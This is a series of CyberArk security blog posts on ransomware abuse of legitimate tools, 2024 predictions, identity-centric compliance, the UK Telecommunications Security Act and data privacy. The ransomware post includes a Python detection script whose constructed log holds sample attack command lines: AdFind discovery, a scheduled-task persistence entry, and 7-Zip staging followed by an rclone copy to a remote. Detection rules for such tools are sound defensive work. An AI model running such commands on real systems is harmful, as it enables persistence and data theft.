When attackers exploit legitimate tools, traditional endpoint security solutions are unlikely to catch them unless behavior analytics capabilities are in place to flag unusual logins, privilege escalation, program execution or other risky activities.

Tracking Legitimate Software Abuse Across the Attack Chain

Ransomware actors increasingly use legitimate software to their advantage at various stages of the attack lifecycle. They employ many different tactics, techniques and procedures (TTPs) to advance their missions, including the examples highlighted below.

Initial infection. It's choose-your-own-adventure when it comes to gaining initial access. Some attackers exploit publicly known vulnerabilities (CVEs) against unpatched targets. Others steal, forge, alter or manipulate cookies from users' web sessions to get in. Or they send phishing emails and trick users into downloading legitimate applications. For instance, in January 2023 CISA warned of a widespread campaign involving remote monitoring and management (RMM) software that, once downloaded, could be used as part of a refund scam to steal money from victims' bank accounts.

Persistence. Attackers also use legitimate software to establish backdoors for persistence and/or command and control (C2). Along the way, they may use it to bypass MFA and/or to modify or disable existing security tools to avoid detection, from terminating endpoint detection and response (EDR)-protected processes to modifying or deleting registry keys or configuration files. In the RMM attacks described above, threat actors used the software's portable executables to gain access without the need for local admin privileges or a full software installation. This allowed them to "effectively bypass common software controls and risk management assumptions," according to CISA.

Many software programs run by default on a machine. By hijacking these programs, attackers can guarantee that their malicious programs will run too. They can also abuse application features such as task schedulers (which launch programs or scripts at pre-defined times or after specified intervals) to maintain persistence. Even legitimate tools built into the operating system, the so-called living-off-the-land binaries (LOLBins), can be abused to cover attackers' tracks, gain persistence or escalate privileges.

Privilege Escalation. Windows operating systems are protected by User Account Control (UAC), a native security feature designed to protect against malicious software and unauthorized changes. If regular business users try to run a program as an administrator, UAC will prompt them to enter the credentials of an admin user before changes can be made. Though most ransomware on the market today doesn’t require admin rights to encrypt data, attackers often target and bypass UAC to elevate access and establish persistence.

Lateral Movement. Many tools can inadvertently facilitate malicious privilege escalation and lateral movement. AdFind, a free command-line query tool used to search Active Directory (AD), is a popular choice. Another is AdvancedRun, which allows software to be run with different settings and enables privilege escalation by changing settings before running software.

What's more, numerous Windows features built for managing machines are also remote procedure call (RPC) servers. This means they can receive remote commands from other machines on the network to run programs. Many RPC interfaces expose functions to end users while enabling communication between client and server programs, opening the door for attackers who can abuse them to move laterally.

Encryption. Encryption can be used both as a tool and a weapon. Encryption tools are critical for hiding data from unauthorized users. These same tools can also be used as ransomware. Or attackers can compromise users with legitimate access to encrypted data to bypass encryption controls altogether.

This summer, the U.S. Department of Health and Human Services (HHS) alerted healthcare organizations to a ransomware attack on a medical facility that "significantly reduced patient treatment capability, rendered digital services unavailable and also threatened exposure of patient personal health information (PHI) and personal identifiable information (PII)." TimisoaraHackerTeam – the ransomware-as-a-service (RaaS) group behind the attack – is described as "unique among attackers" due to its characteristic tactic of abusing legitimate encryption tools, including Microsoft BitLocker and Jetico BestCrypt, to live off the land and eventually encrypt data.

Data Exfiltration. Somewhat surprisingly, ransomware operators that employ double-extortion techniques rarely create their own tools to steal the data used for their leak sites. Rather, they often use legitimate backup tools or similar programs to exfiltrate their victims' data. Earlier this year, CyberArk Labs observed threat actors using Discord, a popular collaboration app, to exfiltrate data via webhooks. Rclone, a command-line program for syncing files with cloud storage, is another appealing option, as it allows attackers to easily move files via transfer protocols such as FTP and SFTP. Attackers also employ tools like 7-Zip, an open-source file archiver, to compress data, which helps them avoid detection before exfiltration.

While most of the above examples focus on Windows, ransomware actors are also modifying their tools to attack across platforms and operating systems. For instance, some employ the cross-platform programming language Rust to target Linux. macOS isn’t immune either. One popular method to infect macOS and iOS devices is exploiting Find My iPhone, an Apple feature that helps users lock their devices if they get lost. If an attacker successfully steals or purchases a user’s Apple ID and password and logs into the device, they can enable the remote device lock via the Find My iPhone app, hold data hostage and display a ransom note on the screen.
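Because every stage above leans on tools that are legitimately present, detection has to key on context (who runs them, from where, and in what sequence) rather than on the binaries alone. The Python below is an added example, not CyberArk Labs code: it runs four such rules over a constructed process-creation log. The pipe-delimited record format, the hostnames and users, the approved-job allow-list and the 15-minute chaining window are all assumptions. It flags AdFind/AdvancedRun execution, a schtasks /create whose task points at a user-writable path, Rclone runs outside the allow-list, and a 7-Zip archive followed shortly by Rclone on the same host, while suppressing an approved backup job.

```python
"""Detection pass over process-creation events for legitimate-tool abuse.

Added example, not CyberArk Labs code. The log format
(ts|host|user|image|cmdline|parent) and every event below are constructed;
rule names, the allow-list and CHAIN_WINDOW are assumed tuning values.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

CHAIN_WINDOW = timedelta(minutes=15)             # archive-then-sync correlation window
DISCOVERY_TOOLS = {"adfind.exe", "advancedrun.exe"}
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\users\\public\\")
# (host, user) pairs approved to run rclone, e.g. a scheduled backup job (constructed).
SYNC_ALLOWLIST = {("srv-bk01", "corp\\svc_backup")}

# Constructed sample log: one workstation abuse chain plus benign server activity.
SAMPLE_LOG = r"""
2023-11-02T09:14:03|WKS-17|corp\jdoe|C:\Program Files\Git\bin\git.exe|git pull|explorer.exe
2023-11-02T09:20:11|WKS-17|corp\jdoe|C:\Windows\Temp\AdFind.exe|AdFind.exe -default|cmd.exe
2023-11-02T09:31:45|WKS-17|corp\jdoe|C:\Windows\System32\schtasks.exe|schtasks /create /tn Updater /tr C:\Users\jdoe\AppData\Roaming\up.exe /sc minute|cmd.exe
2023-11-02T09:40:02|WKS-17|corp\jdoe|C:\Program Files\7-Zip\7z.exe|7z a C:\Users\jdoe\AppData\Local\Temp\fin.7z D:\Finance|cmd.exe
2023-11-02T09:44:30|WKS-17|corp\jdoe|C:\Users\jdoe\Downloads\rclone.exe|rclone copy C:\Users\jdoe\AppData\Local\Temp\fin.7z remote:bk|cmd.exe
2023-11-02T11:02:09|SRV-BK01|corp\svc_backup|C:\Tools\rclone.exe|rclone sync D:\Backups s3:corp-backup|backup.exe
2023-11-02T11:30:00|SRV-BK01|corp\admin|C:\Windows\System32\schtasks.exe|schtasks /create /tn Patch /tr "C:\Program Files\Patcher\run.exe" /sc daily|mmc.exe
"""


@dataclass
class Event:
    ts: datetime
    host: str
    user: str
    image: str
    cmdline: str
    parent: str

    @property
    def exe(self) -> str:
        """Lower-cased image basename, so path tricks do not defeat the match."""
        return self.image.rsplit("\\", 1)[-1].lower()


@dataclass
class Alert:
    ts: datetime
    host: str
    user: str
    rule: str
    detail: str


def parse_log(text: str) -> List[Event]:
    events = []
    for line in text.strip().splitlines():
        ts, host, user, image, cmdline, parent = line.split("|", 5)
        events.append(Event(datetime.fromisoformat(ts), host, user, image, cmdline, parent))
    return events


def detect(events: List[Event]) -> List[Alert]:
    alerts: List[Alert] = []
    last_archive: Dict[str, datetime] = {}       # host -> time of last archive creation
    for e in sorted(events, key=lambda x: x.ts):
        cmd = e.cmdline.lower()
        key: Tuple[str, str] = (e.host.lower(), e.user.lower())
        # Rule 1: AD discovery / elevation helpers named in the post.
        if e.exe in DISCOVERY_TOOLS:
            alerts.append(Alert(e.ts, e.host, e.user, "discovery_tool", e.exe))
        # Rule 2: scheduled task whose action lives in a user-writable location.
        if e.exe == "schtasks.exe" and "/create" in cmd and any(p in cmd for p in USER_WRITABLE):
            alerts.append(Alert(e.ts, e.host, e.user, "schtasks_user_writable", e.cmdline))
        # Remember archive creation ("7z a ...") for the chaining rule.
        if e.exe == "7z.exe" and cmd.split()[1:2] == ["a"]:
            last_archive[e.host] = e.ts
        # Rule 3: sync tool outside the approved (host, user) pairs.
        if e.exe == "rclone.exe" and key not in SYNC_ALLOWLIST:
            alerts.append(Alert(e.ts, e.host, e.user, "sync_tool_unapproved", e.image))
            # Rule 4: staging archive followed by the sync tool on the same host.
            staged = last_archive.get(e.host)
            if staged is not None and e.ts - staged <= CHAIN_WINDOW:
                alerts.append(Alert(e.ts, e.host, e.user, "stage_then_sync",
                                    f"archive at {staged.isoformat()} then {e.exe}"))
    return alerts


def run_sample() -> List[str]:
    """Rule names fired by the constructed log, in event order."""
    return [a.rule for a in detect(parse_log(SAMPLE_LOG))]


if __name__ == "__main__":
    for a in detect(parse_log(SAMPLE_LOG)):
        print(a.ts.isoformat(), a.host, a.user, a.rule, a.detail, sep=" | ")
```

The allow-list is what keeps rule 3 usable in production: the same binary is benign on the backup server and suspicious on a workstation, which is exactly the distinction signature-only endpoint tooling misses. Rule 4 is the one worth the correlation cost, because "compress, then ship" is the observable shape of double-extortion staging regardless of which archiver or sync client is used.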

Block Ransomware Across the Attack Lifecycle

Attackers’ shift to legitimate software is concerning given the highly stealthy nature of these attacks. But fortunately, organizations that take an identity-centric defense-in-depth approach to ransomware protection can largely stay the course. Fundamental endpoint security controls remain the same, including endpoint detection and response (EDR), anti-virus (AV)/next-generation antivirus (NGAV), content disarm and reconstruction (CDR) email security and patching. But most important of all is application control. It doesn’t matter if it’s RaaS, polymorphic malware or some other malicious ransomware variety, if it can’t execute, it can’t deploy ransomware.

This trend underscores the fact that endpoints play a leading – but not singular – role in ransomware attacks. This is becoming increasingly clear as more adversaries embrace this method. When attackers hijack legitimate tools to gain a foothold, least privilege and behavioral analytics capabilities become even more critical for quickly detecting and blocking cloaked threats as they attempt to move through the network, bypass or disarm security systems and reach high-value targets.

CISA offers a list of in-depth mitigation recommendations for organizations looking to improve their cybersecurity posture against ransomware attacks that use legitimate software. This defense-in-depth perspective on ransomware also outlines best practices for shoring up vulnerabilities to mitigate risk. And CyberArk Labs offers extensive research on ransomware families, their commonalities, the path to encryption and mitigation strategies.

Andy Thompson is CyberArk Labs’ Offensive Security Research Evangelist.

Cybersecurity Predictions for 2024 and Beyond
https://www.cyberark.com/blog/cybersecurity-predictions-for-2024-and-beyond/ – Mon, 27 Nov 2023 18:58:15 +0000

Many of us took ChatGPT for a first-time spin just 12 months ago. Then someone hit the speed multiplier button, and just like that, we’re exiting 2023 with whiplash. Generative artificial intelligence’s (GenAI) breakout year was both exciting and unnerving for cybersecurity professionals who understand that technological change and cyber risk are inextricable. Meanwhile, dramatic shifts in the physical world reshaped the threat landscape, redirected cybersecurity strategies and sparked regulatory reforms. Yet some things didn’t change, like attackers’ relentless pursuit of identities and proven ways to steal and use them.

Our team came together to discuss how 2023 trends will impact 2024 and beyond. Here’s a look at our year-by-year predictions based on CyberArk research, customer and partner interactions and industry collaborations.

In 2024 …

Session hijacking will take on an increasingly prominent attack role …

Even more organizations will shift to passwordless access management, from passkeys to MFA, to help thwart attacks. Threat actors will evolve their tactics in lockstep to dupe enterprise and third-party users, steal session cookies and bypass strong authentication mechanisms. Their creativity will pay dividends: by 2024, session hijacking will account for 40% of all cyberattacks. Continued vigilance in securing, monitoring and responding to user sessions and to cookie abuse or compromise is critical. Google's encouraging promise to wipe out cookies for good notwithstanding, never underestimate innovative attackers, who will find another way.

… but 30% of organizations will pay for lax password protections.

Traditional credential theft will be less prevalent when passwordless takes hold and is used correctly. Yet, credential theft isn’t going away. Why? Organizations implementing passwordless authentication may require a backup factor, and many companies will fall back on insecure options – passwords. As security teams fight new fires, attackers will take advantage of lax password protections, and 30% of organizations will experience an increase in data breaches linked to credential theft.

55% of enterprises will expedite tech consolidation to simplify security.

Most organizations’ IT and security environments are already too expansive, complicated and difficult to manage. Teams are rarely skilled in every tool they must cobble together with other ones, forcing them to hire or bring in outside experts. And since each platform focuses on specific things and overlaps with others, teams struggle to see – let alone understand – every potential vulnerability and threat in their cloud-centric environments. Missed SLAs, spiraling overheads and dangerous security drift will push 55% of enterprises to accelerate tech consolidation. They’ll aim to simplify operations and maximize existing resources by working with fewer vendors and systems.

Graphical depiction of CyberArk cybersecurity predictions for 2024, 2025, and 2026.

By 2025 …

Unprotected AI-driven security mechanisms will fuel a vicious cyber risk cycle.

Though organizations are embracing GenAI to bolster cyber defenses, 80% will fail to protect these same AI-based security models – fueling a vicious cyber risk cycle. Gaining an edge on attackers will require an adversarial mindset, from training GenAI models with both offensive and defensive samples to adopting model assurance and regular stress testing (including red teaming and pen testing). Hosting these AI models in highly secure environments with highly secure access protections will be equally critical. Governments will issue forward-thinking guidelines on this front, yet organizations can’t wait for codified standards that may quickly become outdated. Embedding GenAI in product security must happen now.

Under pressure, CISOs will advocate for timely, transparent breach disclosures.

Cybersecurity accountability is getting personal. First, Uber’s security chief was charged with failing to disclose a 2016 data breach to federal regulators. This fall, the SEC charged SolarWinds and its CISO with fraud and internal controls failure in a landmark case that comes on the heels of the agency’s ruling on tighter cybersecurity disclosure requirements. Security leaders around the world are watching closely. By 2025, 60% of Fortune 2000 company CISOs will champion transparent, rapid disclosure practices – not just because of policy but because their careers and reputations are on the line.

By 2026 …

Nearly half of Fortune 500 company boards will seek out a chief AI security officer.

Cybersecurity isn’t an IT issue; it’s the fulcrum of business resilience and stakeholder trust. Most Fortune 500 organizations recognize the high stakes and are beefing up cybersecurity aptitude at the corporate director level. Emerging AI risks are driving an even greater sense of urgency. By 2026, 45% of these enterprises will recruit and work to appoint a chief AI security officer to the board. This leader will possess both technical expertise and business acumen, playing an influential role in advancing AI innovation, managing resulting risks and safeguarding the AI-based security models. They will be deeply entrenched in cybersecurity strategy and expand oversight and reporting mechanisms to better measure and improve security initiatives, risk assessments and incident response plans.

Multinational organizations will face a regulatory reckoning.

Sixty percent of all regulated global entities will struggle mightily to comply with ever-increasing data protection and breach disclosure requirements, especially as GenAI use cases expand. More organizations will face non-compliance penalties as regulators’ bite catches up to their bark. Consider that today, failure to comply with the European Union’s GDPR alone can cost organizations as much as €20 million or 4% of annual global turnover, whichever is higher. Already hefty fines will continue to climb with potentially crippling impact.

Major global powers will call for a Cybersecurity Geneva Convention.

Sophisticated nation-state attacks, particularly those targeting critical infrastructure, can result in widespread disruptions, life-threatening outages and rippling damage across software supply chains. Growing concerns of escalation to conventional warfare will prompt major global powers to take dramatic steps to enhance cyber resilience, legal frameworks and international cooperation. As part of this, these countries will push to establish a Cybersecurity Geneva Convention to deter nation-state attacks and hold perpetrators responsible.

2023 threw some major curveballs. But it also reminds us that strong cybersecurity programs don’t swerve or stall in reaction. They’re agile enough to stay in the game, continuously refining practices, making strategic, risk-based investments and proactively preparing for whatever comes next.

Reduce Compliance Complexities by Securing All Identities https://www.cyberark.com/blog/reduce-compliance-complexities-by-securing-all-identities/ Mon, 20 Nov 2023 22:16:50 +0000 https://www.cyberark.com/?p=184361

When complying with regulations and frameworks, it’s hard to keep up when the rules keep evolving.

Auditors are no longer just seeking reports on what your identities can access – they now require proof that you have controls for securing those identities (like a math assignment, you have to show your work).

And if a framework or regulation’s requirements previously focused on highly privileged IT users’ access … that’s evolving too. While foundational PAM controls and reporting will always be essential, now you must apply the requirements to a broader range of human and non-human identities across any environment.

What does this expanded focus look like? Here are a few examples:

  • The NIS2 directive emphasizes strengthening security for critical infrastructure sectors, which are increasingly reliant on cloud infrastructure and operational technology (OT), two areas full of frequently targeted identities.
  • The Digital Operational Resiliency Act (DORA) calls upon financial services companies to apply security oversight to internal users and third parties (e.g., vendors) with high-risk access.
  • The NIST Secure Software Development Framework requires that software developers and procurers attest to adequate and proper security features, including identity management.

Meanwhile, the stakes of security compliance keep rising. The average cost of a data breach increases by as much as 12.6% when an organization is found to be non-compliant:

  • Average cost overall: $4.45 million
  • Average cost when non-compliant: $4.67 million
  • Average cost when highly non-compliant: $5.05 million

The good news is that there’s a direct correlation between strong controls and strong compliance. With the right capabilities for discovering, securing and reporting high-risk access, you can achieve a proactive stance to meet regulatory demands. In this post, we’ll explore some key steps you can take.

Discovering and Assessing High-Risk Access

You can’t protect (or report on) what you can’t see. And that’s why it’s so concerning that 62% of security decision-makers lack a complete picture of human and non-human access to sensitive resources.

Let’s look at a few examples of how discovering high-risk access can bolster your visibility, security, and, in turn, compliance posture.

One place to start: conduct an inventory of all accounts with administrative or elevated privilege to systems, apps, servers, networks and more. Another critical step is discovering privilege across your organization’s myriad endpoints, like workstations and servers. These are fundamental types of visibility; many organizations are accustomed to them.

But when we delve into new types of identities and environments, compliance becomes more difficult.

For example, developers and cloud ops teams are often over-permissioned with direct access to sensitive resources as their organizations rush to innovate. A CyberArk analysis of the three major cloud service providers shows that a user can access approximately 1,400 native services that, collectively, have over 40,000 access controls.

As part of their compliance programs, security teams should lean into cloud complexities and discover the following:

  • Over-permissioned IAM roles and excessive permissions.
  • Toxic combinations of permissions allowing privilege escalation or lateral movement.
  • Unmanaged shared accounts and their myriad dependencies.
  • Hard-coded credentials for developers working in the cloud.
  • Everyday employees’ access to business applications.

In many cases, it’s up to you to interpret compliance requirements and guidelines in the context of new identities, environments and threats (these variables won’t necessarily be mentioned by name in a 100-page regulatory document). In other cases, the direction may be clear-cut, calling out specific areas like virtual infrastructure. Regardless, high-risk access – in all its shapes, forms and locations – requires fierce protection.

Security compliance is evolving. Any identity can become privileged based on what it can access. This graphic shows three examples of requirements and guidelines that call for a comprehensive identity security mindset.

Implementing and Demonstrating Identity Security Controls

As mentioned, giving auditors a report on what you’ve discovered is only part of the job. You must demonstrate that you have strong controls in place to reduce risk and build organizational resilience against attacks.

Let’s say you’ve completed an inventory of high-risk access across privileged IT users and accounts. Your next step is securing that privileged access. This starts with creating policies and implementing controls around password length, complexity, storage and rotation schedules. The work continues with steps such as enabling just-in-time (JIT) access and requiring multi-factor authentication (MFA).

What comes next after you’ve finished discovering privilege across your organization’s endpoints, like workstations? Here, a near-term priority would be revoking local administrator rights. An essential next step would be implementing capabilities to elevate privileges for authorized applications or tasks. These are effective ways to protect against ransomware – and great proof points for auditors to demonstrate progress.

As mentioned, even if securing access in the cloud isn’t explicitly described in a regulation, you’re still responsible for bringing entitlements and roles into compliance. Where to start? Consider applying a fast-emerging security principle known as zero standing privileges (ZSP), which – among many benefits – can help your organization by:

  • Reducing the risk of credential theft by preventing standing access.
  • Enforcing real-time least privilege in the cloud by granting only the relevant permissions a user needs – and only when required – to accomplish a given task.
  • Invalidating developer secrets that are embedded into code.

Gaining Nonstop Visibility Across Identities

You can build upon the findings from your initial discovery process with ongoing, real-time visibility into the access (and actions) of identities across your organization.

This is where it’s essential to look beyond siloed categories of controls or tools. We recommend an integrated identity security approach, where the underlying solutions can share information, act on insights and provide a unified view of audit data across all forms of human and non-human access.

With this approach, you can gain a comprehensive view of who has privileges and authorization to what resources, with capabilities for discovering, adjusting, certifying and revoking access.

With identity security, you can bring together:

  • Session recordings and audit trails for high-risk scenarios – applied to highly privileged IT users and third-party vendors or workforce users in web applications storing sensitive data.
  • User behavior analytics for building a knowledge of each user’s access behavior, authentication history, and anomalous activity.
  • Audit trails to track and analyze privilege elevation attempts for human users and applications, enabling continuous visibility and control over endpoints.
  • Integration with security information and event management (SIEM) tools for collecting/exporting log data.

Gaining Efficiencies to Help Overstretched Security Teams

Improved visibility and controls can help you build a proactive stance to meet auditors’ requirements. But how do you account for the limitations many organizations have regarding time, bandwidth and staffing?

For example, research shows that the mean time for organizations to identify a data breach is 204 days. And yet, the SEC now requires public companies to report attacks within four days of determining an incident is “material.”

How can organizations be proactive when timelines are tighter than ever?

Organizations can gain back time and potentially save money by applying automated capabilities to replace resource-intensive, manual tasks that often bog down security teams. This includes automating governance processes to ensure checks and balances are in place for maintaining compliance.

For example:

  • Continuously enforcing least privilege with access reviews and certifications scheduled for recurring dates.
  • Integrating access certification processes with your privileged access management (PAM) program and generating detailed logs and reports for audits.
  • Continuously discovering which identities have access to specific privileged accounts and sensitive resources.

Building Compliance Strategies to Earn Auditors’ Trust

Visibility and controls can’t exist in a vacuum; they need to be part of a strategy that you can communicate to auditors. Here are three key building blocks for developing a compliance program that reflects today’s realities.

1. Discover and Plan
As mentioned, you can only secure and protect what you know. This part goes beyond an inventory or system discovery process to include:

  • Engaging in dialogue with relevant teams (application, support, etc.) to understand how they currently work.
  • Documenting their systems and access – but also ensuring they’re on board early. Successful adoption requires winning hearts and minds.

2. Implement and Rollout
If you’re regulated or if external auditors have called out gaps in controls, focus your implementation on a combination of:

  • Prioritizing critical systems and reducing complexity, e.g., avoid getting bogged down by low-priority, high-complexity use cases.
  • Employing automation from the implementation, e.g., automated checks and balances, to ensure recurring access certifications.

3. Expand and Communicate
You can’t do everything on day one. But in the same breath, attackers only need one gap to breach and wreak havoc. A proactive approach means building:

  • A clear plan for how you intend to bridge gaps identified in your discovery process. Audits and reviews are always a work in progress.
  • An implementation roadmap for a) progression tracking and b) open dialogue with regulators to discuss plans, goals and gains.

Building a Proactive Compliance Approach Centered on Identity Security

The best practices we’ve discussed apply to a wide range of frameworks and regulations across industries and geographic regions. No matter what, the connection between a strong security posture and a strong compliance program is clear. If you have full visibility into what your identities can access, complemented by controls for securing that access, you’ll be in a much better place to meet auditors’ requirements.

If you’d like to learn more, here are two resources that can help you:

John Natale is a senior content marketing manager at CyberArk.

How Telecom Providers Can Bolster Identity Security to Meet the UK TSA https://www.cyberark.com/blog/how-telecom-providers-can-bolster-identity-security-to-meet-the-uk-tsa/ Tue, 14 Nov 2023 21:28:23 +0000 https://www.cyberark.com/?p=184254

As technology evolves, so do the threats that loom over our communication infrastructure. The rollout of 5G, the rise of artificial intelligence (AI) and our ongoing dependence on these networks combine to make the telecommunications industry a prime target for cyberattacks.

The consequences of attacks on telecommunications organisations – usually a component of critical national infrastructure – can be far-reaching, extending beyond affecting corporate interests and compromising staff and customer identity security, right up to affecting national security. As such, regulators and operators are motivated to act in tandem to protect these critical national assets.

The Growing Threat to Telecom Providers

Over the last few years, several cybersecurity regulations have set out requirements for how telecom providers are required to approach and implement security. Some are specific to the telecom sector, like the U.K.’s Telecommunications (Security) Act (TSA). In contrast, others are generic – like the NIS2 directive, which applies to multiple critical industry sectors, telecommunications being one.

Driving these global security efforts in the telecom industry is a collective recognition and awareness of not just the severity of the potential threat but the interests of billions of users. With this shift, many advanced economies are increasingly placing the onus and burden of protection on the shoulders of the big telecom providers, prominent actors in the digital ecosystem who can absorb and implement that responsibility. As a result, stakeholders are subjecting telecom providers’ services and networks in their downstream supply chain to high scrutiny, especially concerning identity security – like vendor admin access – and managed service provider (MSP) contract requirements and obligations.

This scrutiny is welcome because telecommunications providers – though very different in terms of the services they provide and infrastructure that they sit on compared to, for instance, a bank – are vulnerable to cyberattack in very similar ways to other organisations that have fully embraced the power of software, digitalisation and the cloud. Attacking the software supply chain of an organisation that has an extensive digital ecosystem is a proven method of infiltrating the target infrastructure to compromise identity security, extract privileged credentials, modify scripts, spread malware, take sensitive data and many other potentially devastating actions. The effects can and often are magnified beyond users of the compromised software to their customers, suppliers and partners.

The drive to up the cybersecurity game across telecommunications infrastructure is a global phenomenon, which stems from recognizing how fast and how far the threat landscape has evolved. In attempts to address the current threat landscape, many countries are now updating their legislative frameworks, while others – like the U.K. – have recently made updates.

Building Telecommunications Cybersecurity Resilience

The U.K., like many other countries, is home to a competitive telecommunications market serving its 68 million residents. Recognizing the critical importance of securing the nation’s telecommunications industry, in 2020, the National Cyber Security Centre (NCSC) conducted its security analysis for the U.K. telecom sector, highlighting the risks associated with telecommunication companies’ supply chains, especially those linked to high-risk vendors such as non-national infrastructure suppliers. The U.K. government subsequently passed the TSA in 2021 to address these concerns and bolster national infrastructure security.

The TSA empowers the U.K.’s communications regulator Ofcom (Office of Communications) to intervene in the cybersecurity practices of telecom service providers. It establishes a comprehensive security framework to identify, reduce and mitigate security risks. Furthermore, the accompanying 2022 Telecommunications Security Code of Practice classifies public telecom providers into one of three tiers based on their commercial scale, each with distinct compliance obligations and measures in the code to comply with. The Code of Practice document outlines specific timelines, with Tier 1 providers having to implement some measures as early as March 31, 2024. In cases of non-compliance, Ofcom can issue financial penalties.

The three provider tiers are:

  • Tier 1. Public telecom providers with annual revenue over £1 billion
  • Tier 2. Public telecom providers with annual revenue over £50 million but less than £1 billion
  • Tier 3. Public telecom providers with annual revenue of less than £50 million

Implementing the TSA requirements is no small task. It introduces a comprehensive security framework that must be applied across complex and extensive networks, interconnected systems and legacy infrastructure. Reevaluating current security practices, identifying vulnerabilities and making necessary adjustments is resource intensive. Moreover, it may impact ongoing network upgrades and transformation projects. Collaboration with internal stakeholders and coordination with regulatory bodies add to the complexity.

Preparing to Meet TSA Requirements Now

Telecom providers, services and networks in the U.K. are now under pressure to dial up their cybersecurity posture, take accountability and present to Ofcom what cybersecurity measures are in place. The 2022 Telecommunications Security Code of Practice also outlines specific technical requirements in areas such as network architecture, data and network protection, supply chain management and identity security to help organisations prepare.

While there is an enormous amount of information to absorb, here are four simple steps we suggest to help you get started now:

  1. Plan based on your tier classification. Take time to read and absorb available legislation materials applicable to your tier classification, and keep in mind that more rigorous regulations are coming.
  2. Define your scope and conduct an asset inventory. Identify which systems and operations are in scope for the regulation and prioritise work according to the timelines set by the tiered classification guidance.
  3. Scrutinize your supply chain. Supplier assurance is a huge part of achieving compliance with the 80 Code of Practice measures related to supply chain validation. Identify and develop a system for validating and managing your supply chain appropriately.
  4. Seek help from a reputable partner. Work with an experienced cybersecurity partner that can help interpret the regulation, understand your organisation’s current scope and posture, and devise a plan to help you achieve compliance.

While the scope of the TSA is broad, there are smart ways that telecom providers can achieve significant wins, in particular by ensuring identity security is maintained, with the knowledge that the majority of breaches and attacks involve the compromise of identities as an essential step for attackers – nation-state and other bad actors – to achieve their goals.

One of the fundamental TSA principles (point 1.11) is “assumed compromise,” a cybersecurity mindset that expects an organisation to be breached if it hasn’t already been. This assumption leads to the expectation that any identity across your organisation – whether human or machine – may be compromised. Therefore, your focus should be on identifying, isolating and stopping threats.

Assumed compromise is also a foundational tenet of Zero Trust architecture, where all identities are continuously authenticated and authorized before securely granting just-in-time (JIT) access with the right set of permissions.

Specific actions to reduce the attack surface should include introducing the following capabilities:

  • Securing, logging and monitoring privileged access for internal and external users.
  • Removing default passwords for systems, users and applications.
  • Discovering and onboarding unmanaged privileged accounts and credentials.
  • Detecting anomalous behavior and indicators of compromise with policy-driven remediation capabilities.
  • Removing local admin rights and implementing application controls to limit what users can do on specific endpoints and which applications are whitelisted.
  • Ensuring every user is who they claim to be with strong, contextual, risk-based authentication.

Telecom Providers: Guardians of the Grid

The telecommunications industry’s critical role in our connected world necessitates rigorous security measures. The TSA and accompanying Telecommunications Security Code of Practice provide a much-needed framework to ensure the resilience and integrity of our communication networks in the U.K. Introducing the TSA and potential fines imposed by Ofcom compels telecom providers to adopt a new approach and invest in a robust security strategy. In our evolving digital landscape, telecom providers are the guardians of the grid, and their commitment to protecting critical national infrastructure is essential for a secure and connected future.

CyberArk, with many years of experience partnering with the U.K.’s largest telecom providers, has closely collaborated with the U.K.’s NCSC to comprehend the complex technical requirements of the TSA. Check out our eBook, “Identity Security: Why It Matters and Why Now,” to learn how CyberArk’s Identity Security framework – grounded in Zero Trust and intelligent privilege controls – can help your organisation defend against identity-centric threats.

Mark Seddon is CyberArk’s Director of Solution Engineering UKI; Violeta Pavel is CyberArk’s Director of Corporate Sales EMEA.

Identity Security’s Crucial Role in Safeguarding Data Privacy https://www.cyberark.com/blog/identity-securitys-crucial-role-in-safeguarding-data-privacy/ Thu, 09 Nov 2023 17:46:51 +0000 https://www.cyberark.com/?p=184232

More than 130 global jurisdictions have enacted data privacy laws. While each contains rules and requirements distinct to their regions, they share a common priority: identity security.

That’s because if an attacker compromises a single identity in an organization where sensitive data is collected, stored and handled, it’s all downhill from there. A single stolen credential – an IT admin’s SSH key, a developer’s secret or a vendor’s password – is the starting point for a nefarious momentum that’s tough to stop. This is why securing the identities that can access sensitive data and the identity-rich infrastructure where your data lives is essential.

Read on for an examination of why identity security should live at the core of data privacy strategies, along with best practices for putting it there.

What’s at Stake? Data’s Value and Inherent Risks

In today’s digital age, data is the lifeblood of businesses and organizations, fueling decision-making, innovation and customer trust. And the benefits of being an effective data steward are often rooted in outcomes that don’t happen. For example, a health insurance company that keeps its members’ data off the dark web won’t appear in reputation-damaging headlines; that’s the ideal outcome. A consumer technology company that protects its users’ data from breaches won’t join the ranks of firms contributing to the billions other companies have paid in General Data Protection Regulation (GDPR) fines.

The list goes on; the stakes keep rising.

In short, data is the currency of the digital economy. It can be quietly stolen, sold and exploited relatively easily, making it an attractive target. And the owners of personal data have very few options for stopping these outcomes. If consumers learn their credit card information was affected by a breach, they can cancel the card or change the password relatively easily. In contrast, personal data is far more challenging to modify once compromised. It is intrinsic to who you are, the life you’ve built and every entity you engage with – people, healthcare institutions, businesses and governments.

Controlling Access to Data: Start with Identity

This heightened value of data underscores the need for comprehensive data privacy measures and strong identity security controls and hygiene. And the pressure is on. Regulations like GDPR, the California Consumer Privacy Act (CCPA) and the Network and Information Systems (NIS2) directive in the EU have set stringent standards for data protection. But the job of securing data is complex. Across privileged IT users and everyday employees, there are too many identities and privileges to handle. The economic pressure and staff burden make it impossible for security teams to keep up with access certification.

Data privacy begins with controlling who can access sensitive information. In the realm of identity security, this involves managing access rights effectively. Whether it’s sales representatives accessing customer data, HR professionals handling sensitive employee information or IT managers overseeing system resources, it’s essential to maintain the principle of least privilege (PoLP) to ensure that only the right people have access to specific data, reducing the risk of unauthorized data exposure. This requires comprehensive identity and access management (IAM) controls and capabilities.

Here are two examples:

  • An adaptive form of multi-factor authentication (MFA) can enable organizations to strengthen their security posture through additional checks to validate identities in multiple layers.
  • Automated lifecycle management can help organizations easily define and enforce each user’s unique role, responsibilities and access privileges.

Data Location and Privileged Access: Where PAM Comes into Play

While controlling access to data is crucial, securing the infrastructure where data is stored and managed is equally essential. This is where privileged access management (PAM) controls come into play.

Consider admins needing access to critical databases or engineers responsible for maintaining cloud-based storage and data services. A comprehensive PAM program, rooted in fundamentals but evolved to secure a broader range of identities, can ensure:

  • Access is tightly protected with layers of powerful, holistic control, helping organizations adopt a Zero Trust mindset and deliver measurable cyber-risk reduction.
  • Privileged users’ sessions are fully isolated and monitored to prevent the spread of malware and monitor end user behavior for forensics, audit and compliance purposes – without sacrificing the native user experience.
  • Identities are continuously verified with strong authentication mechanisms, including biometrics, to help validate identities following a Zero Trust philosophy.
